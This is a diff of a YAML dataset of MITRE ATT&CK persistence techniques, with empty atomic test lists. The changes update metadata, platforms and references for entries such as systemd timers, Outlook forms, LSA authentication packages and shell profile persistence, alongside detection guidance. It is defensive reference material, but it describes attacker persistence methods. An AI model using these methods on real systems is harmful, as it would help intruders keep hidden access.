-        On macOS, monitor for execution of <code>kextload</code> commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the <code>kext_policy</code> table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, <code>/var/db/SystemPolicyConfiguration/KextPolicy</code>.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: persistence
-      - kill_chain_name: mitre-attack
-        phase_name: privilege-escalation
-      x_mitre_is_subtechnique: true
-      x_mitre_data_sources:
-      - 'Command: Command Execution'
-      - 'File: File Creation'
-      - 'File: File Modification'
-      - 'Kernel: Kernel Module Load'
-      - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - root
-      x_mitre_attack_spec_version: 2.1.0
+        url: https://en.wikipedia.org/wiki/Loadable_kernel_module#Linux
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.006
     atomic_tests: []
   T1574.013:
@@ -32812,7 +33235,7 @@ persistence:
         url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
         description: Microsoft. (2021, November 23). NtQueryInformationProcess function
           (winternl.h). Retrieved February 4, 2022.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-22T15:47:33.915Z'
       name: KernelCallbackTable
       description: |-
         Adversaries may abuse the <code>KernelCallbackTable</code> of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The <code>KernelCallbackTable</code> can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once <code>user32.dll</code> is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -32838,12 +33261,10 @@ persistence:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053.006:
     technique:
-      modified: '2023-09-08T11:56:26.862Z'
+      modified: '2024-10-15T16:42:51.536Z'
       name: 'Scheduled Task/Job: Systemd Timers'
       description: |-
         Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
@@ -32921,9 +33342,8 @@ persistence:
         url: http://man7.org/linux/man-pages/man1/systemd.1.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.006
     atomic_tests: []
   T1542.004:
@@ -32950,7 +33370,7 @@ persistence:
         url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
         description: Omar Santos. (2020, October 19). Attackers Continue to Target
           Legacy Devices. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-22T02:18:19.568Z'
       name: ROMMONkit
       description: |-
         Adversaries may abuse the ROM Monitor (ROMMON) by loading an unauthorized firmware with adversary code to provide persistent access and manipulate device behavior that is difficult to detect. (Citation: Cisco Synful Knock Evolution)(Citation: Cisco Blog Legacy Device Attacks)
@@ -32972,41 +33392,10 @@ persistence:
       - 'Firmware: Firmware Modification'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1137.003:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
-      type: attack-pattern
-      created: '2019-11-07T20:06:02.624Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.003
-        url: https://attack.mitre.org/techniques/T1137/003
-      - source_name: SensePost Outlook Forms
-        url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
-        description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
-          February 4, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
-      - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
-        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
-          provides blue teams with the ability to detect Ruler usage against Exchange.
-          Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:02:00.782Z'
       name: Outlook Forms
       description: |-
         Adversaries may abuse Microsoft Outlook forms to obtain persistence on a compromised system. Outlook forms are used as templates for presentation and functionality in Outlook messages. Custom Outlook forms can be created that will execute code when a specifically crafted email is sent by an adversary utilizing the same custom Outlook form.(Citation: SensePost Outlook Forms)
@@ -33015,22 +33404,49 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--a9e2cea0-c805-4bf8-9e31-f5f0513a3634
+      created: '2019-11-07T20:06:02.624Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/003
+        external_id: T1137.003
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SensePost NotRuler
+        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+          provides blue teams with the ability to detect Ruler usage against Exchange.
+          Retrieved February 4, 2019.
+        url: https://github.com/sensepost/notruler
+      - source_name: SensePost Outlook Forms
+        description: Stalmans, E. (2017, April 28). Outlook Forms and Shells. Retrieved
+          February 4, 2019.
+        url: https://sensepost.com/blog/2017/outlook-forms-and-shells/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1574:
     technique:
@@ -33096,7 +33512,6 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1543.005:
     technique:
@@ -33170,11 +33585,10 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1078:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:09:46.024Z'
       name: Valid Accounts
       description: |-
         Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -33191,7 +33605,6 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
-      x_mitre_attack_spec_version: 3.1.0
       x_mitre_contributors:
       - Syed Ummar Farooqh, McAfee
       - Prasad Somasamudram, McAfee
@@ -33201,7 +33614,7 @@ persistence:
       - Netskope
       - Mark Wee
       - Praetorian
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -33210,19 +33623,17 @@ persistence:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '2.6'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.7'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'User Account: User Account Authentication'
@@ -33270,11 +33681,12 @@ persistence:
         url: https://technet.microsoft.com/en-us/library/dn487457.aspx
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1556.006:
     technique:
-      modified: '2024-04-16T00:20:21.488Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Multi-Factor Authentication
       description: "Adversaries may disable or modify multi-factor authentication
         (MFA) mechanisms to enable persistent access to compromised accounts.\n\nOnce
@@ -33303,24 +33715,26 @@ persistence:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Liran Ravich, CardinalOps
       - Muhammad Moiz Arshad, @5T34L7H
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
       - Linux
       - macOS
-      x_mitre_version: '1.2'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -33355,9 +33769,6 @@ persistence:
         url: https://docs.microsoft.com/en-us/azure/active-directory/governance/conditional-access-exclusion
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1505.004:
     technique:
@@ -33417,7 +33828,7 @@ persistence:
         description: Falcone, R. (2018, January 25). OilRig uses RGDoor IIS Backdoor
           on Targets in the Middle East. Retrieved July 6, 2018.
         source_name: Unit 42 RGDoor Jan 2018
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-17T15:06:24.161Z'
       name: IIS Components
       description: |-
         Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: <code>Get{Extension/Filter}Version</code>, <code>Http{Extension/Filter}Proc</code>, and (optionally) <code>Terminate{Extension/Filter}</code>. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)
@@ -33442,13 +33853,11 @@ persistence:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1505.004
     atomic_tests: []
   T1546:
     technique:
-      modified: '2024-03-01T15:49:15.588Z'
+      modified: '2024-10-15T15:57:00.731Z'
       name: Event Triggered Execution
       description: "Adversaries may establish persistence and/or elevate privileges
         using system mechanisms that trigger execution based on specific events. Various
@@ -33501,8 +33910,8 @@ persistence:
       - Windows
       - SaaS
       - IaaS
-      - Office 365
-      x_mitre_version: '1.3'
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'WMI: WMI Creation'
@@ -33550,78 +33959,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546
     atomic_tests: []
   T1546.004:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Robert Wilson
-      - Tony Lambert, Red Canary
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
-      type: attack-pattern
-      created: '2020-01-24T14:13:45.936Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1546.004
-        url: https://attack.mitre.org/techniques/T1546/004
-      - source_name: intezer-kaiji-malware
-        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
-        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
-          turning to Golang. Retrieved December 17, 2020.'
-      - source_name: bencane blog bashrc
-        url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
-        description: Benjamin Cane. (2013, September 16). Understanding a little more
-          about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
-      - source_name: anomali-rocke-tactics
-        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
-        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
-          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
-          December 17, 2020.
-      - source_name: Linux manual bash invocation
-        url: https://wiki.archlinux.org/index.php/Bash#Invocation
-        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
-      - source_name: Tsunami
-        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
-        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
-          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
-      - source_name: anomali-linux-rabbit
-        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
-        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
-          Malware Out of a Hat. Retrieved December 17, 2020.
-      - source_name: Magento
-        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
-        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
-          Vector. Retrieved December 17, 2020.
-      - source_name: ScriptingOSX zsh
-        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
-        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
-          Files. Retrieved February 25, 2021.'
-      - source_name: PersistentJXA_leopitt
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
-          for macOS. Retrieved January 11, 2021.
-      - source_name: code_persistence_zsh
-        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
-        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
-          Retrieved January 11, 2021.
-      - source_name: macOS MS office sandbox escape
-        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
-        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
-          Retrieved August 20, 2021.
-      - source_name: ESF_filemonitor
-        url: https://objective-see.com/blog/blog_0x48.html
-        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
-          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-25T15:02:24.143Z'
       name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
       description: "Adversaries may establish persistence through executing malicious
         commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -33669,6 +34011,10 @@ persistence:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Robert Wilson
+      - Tony Lambert, Red Canary
+      x_mitre_deprecated: false
       x_mitre_detection: "While users may customize their shell profile files, there
         are only certain types of commands that typically appear in these files. Monitor
         for abnormal commands such as execution of unknown programs, opening network
@@ -33679,9 +34025,13 @@ persistence:
         events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
         most Linux and macOS systems, a list of file paths for valid shell options
         available on a system are located in the <code>/etc/shells</code> file.\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
       x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -33690,8 +34040,67 @@ persistence:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+      created: '2020-01-24T14:13:45.936Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/004
+        external_id: T1546.004
+      - source_name: anomali-linux-rabbit
+        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+          Malware Out of a Hat. Retrieved December 17, 2020.
+        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+      - source_name: anomali-rocke-tactics
+        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+          December 17, 2020.
+        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+      - source_name: Linux manual bash invocation
+        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+        url: https://wiki.archlinux.org/index.php/Bash#Invocation
+      - source_name: ScriptingOSX zsh
+        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+          Files. Retrieved February 25, 2021.'
+        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+      - source_name: bencane blog bashrc
+        description: Benjamin Cane. (2013, September 16). Understanding a little more
+          about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+        url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+      - source_name: macOS MS office sandbox escape
+        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+          Retrieved August 20, 2021.
+        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+      - source_name: Magento
+        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+          Vector. Retrieved December 17, 2020.
+        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+      - source_name: Tsunami
+        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+      - source_name: PersistentJXA_leopitt
+        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+          for macOS. Retrieved January 11, 2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: code_persistence_zsh
+        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+          Retrieved January 11, 2021.
+        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+      - source_name: ESF_filemonitor
+        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+        url: https://objective-see.com/blog/blog_0x48.html
+      - source_name: intezer-kaiji-malware
+        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+          turning to Golang. Retrieved December 17, 2020.'
+        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.004
     atomic_tests: []
   T1547.002:
@@ -33728,7 +34137,7 @@ persistence:
         Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
 
         Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=&lt;target binary&gt;</code>. The binary will then be executed by the system when the authentication packages are loaded.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:29:36.291Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Authentication Package
       x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -33751,12 +34160,11 @@ persistence:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.002
     atomic_tests: []
   T1546.015:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:34:29.402Z'
       name: 'Event Triggered Execution: Component Object Model Hijacking'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by hijacked references to Component Object Model (COM) objects.
@@ -33834,41 +34242,11 @@ persistence:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.015
     atomic_tests: []
   T1137.004:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
-      type: attack-pattern
-      created: '2019-11-07T20:09:56.536Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1137.004
-        url: https://attack.mitre.org/techniques/T1137/004
-      - source_name: SensePost Outlook Home Page
-        url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
-        description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
-          Ruler Vector. Retrieved February 4, 2019.
-      - source_name: Microsoft Detect Outlook Forms
-        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
-        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
-          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
-          4, 2019.
-      - source_name: SensePost NotRuler
-        url: https://github.com/sensepost/notruler
-        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
-          provides blue teams with the ability to detect Ruler usage against Exchange.
-          Retrieved February 4, 2019.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:02:13.742Z'
       name: 'Office Application Startup: Outlook Home Page'
       description: |
         Adversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)
@@ -33877,27 +34255,54 @@ persistence:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
 
         Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Command: Command Execution'
       - 'Process: Process Creation'
-      x_mitre_permissions_required:
-      - Administrator
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--bf147104-abf9-4221-95d1-e81585859441
+      created: '2019-11-07T20:09:56.536Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1137/004
+        external_id: T1137.004
+      - source_name: Microsoft Detect Outlook Forms
+        description: Fox, C., Vangel, D. (2018, April 22). Detect and Remediate Outlook
+          Rules and Custom Forms Injections Attacks in Office 365. Retrieved February
+          4, 2019.
+        url: https://docs.microsoft.com/en-us/office365/securitycompliance/detect-and-remediate-outlook-rules-forms-attack
+      - source_name: SensePost NotRuler
+        description: SensePost. (2017, September 21). NotRuler - The opposite of Ruler,
+          provides blue teams with the ability to detect Ruler usage against Exchange.
+          Retrieved February 4, 2019.
+        url: https://github.com/sensepost/notruler
+      - source_name: SensePost Outlook Home Page
+        description: Stalmans, E. (2017, October 11). Outlook Home Page – Another
+          Ruler Vector. Retrieved February 4, 2019.
+        url: https://sensepost.com/blog/2017/outlook-home-page-another-ruler-vector/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1137.004
     atomic_tests: []
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
